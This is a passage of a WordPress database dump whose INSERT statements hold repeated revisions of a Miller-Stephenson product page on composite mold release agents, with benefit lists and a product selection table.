quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:53:05', '2016-11-08 20:53:05', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2954, 3, '2016-11-08 21:01:12', '2016-11-08 21:01:12', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 21:01:12', '2016-11-08 21:01:12', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2955, 3, '2016-11-08 21:02:06', '2016-11-08 21:02:06', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 21:02:06', '2016-11-08 21:02:06', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2956, 0, '2016-11-09 13:10:02', '2016-11-09 13:10:02', '', '', '', 'publish', 'closed', 'closed', '', '2956', '', '', '2016-11-09 13:10:03', '2016-11-09 13:10:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2956/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2957, 2, '2016-11-09 14:11:20', '2016-11-09 14:11:20', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\n<ul>\n 	<li>Low or No volatile organic compounds (VOC)</li>\n 	<li>Minimal odor; 100% 